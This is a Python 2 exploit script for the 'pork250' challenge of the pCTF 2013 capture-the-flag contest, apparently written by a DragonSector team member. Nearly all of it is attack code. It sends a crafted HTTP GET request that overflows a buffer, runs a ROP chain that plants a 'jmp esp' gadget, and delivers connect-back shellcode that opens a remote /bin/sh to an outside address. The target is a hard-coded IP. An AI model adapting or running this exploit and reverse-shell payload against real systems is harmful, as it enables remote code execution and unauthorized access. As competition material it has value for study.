## pCTF 2013 
## pork250
## mak  - DragonSector

#!/usr/bin/env python2

import socket,time
from struct import *

#host = "localhost"
host = "54.235.20.205"
junk = "A"*4


## modified connect back
shellcode2 = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
    "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x5b\xe4\xc6\x61\x66\x68"
    "\x1f\x90\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
    "\x80\x52\x68\x30\x30\x73\x68\x89\xe6\xfe\x0e\xfe\x4c\x24\x01"
    "\x68\x30\x62\x69\x6e\x89\xe6\xfe\x0e\x89\xe3\x52\x53"
    "\x89\xe1\xb0\x0e\xfe\xc8\xfe\xc8\xfe\xc8\xcd\x80"
)

## write jmp esp @ 0x804ab72
rop = pack('I',0x08049346) # pop ebx ; pop ebx ; ret
rop += pack('I',0x0B8A0008 + 0x80484af) # [shif - ptr] == 0xe500
rop += junk
rop += pack('I',0x080499ce) #add eax, dword [ebx-0x0B8A0008] ; add esp, 0x04 ; pop ebx ; pop ebp ; ret
rop += junk*3

rop += pack('I',0x08049346) # pop ebx ; pop ebx ; ret
rop += pack('i',0x804ab72-0x5D5B04C4) # [shif - ptr] == 0xffff0000
rop += junk
rop += pack('I',0x08048b3e) # add dword [ebx+0x5D5B04C4], eax ; ret
rop += pack('I',0x804ab72)


print "Shellcode lenght: %d" % len(shellcode2)

x = "GET http://"
x += "A"*0x400
x += pack('I',0x080499a2) #  fix esp
x +=("A"*4) + pack('I',0x0804a010) *2
x += "A"*32 #pack('I',0x804884a) *8 # ret nop
x += rop
x += shellcode2
x += " H\r\n"


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,33227))
print "concectd to: %s" % host
s.send(x)
print "payload sended"

time.sleep(1)
s.send("\r\n"*100)
time.sleep(10)
#s.send(("A"*0x600) + ' http://asdf '  + "B"*0x100)
#print s.recv(0x1000)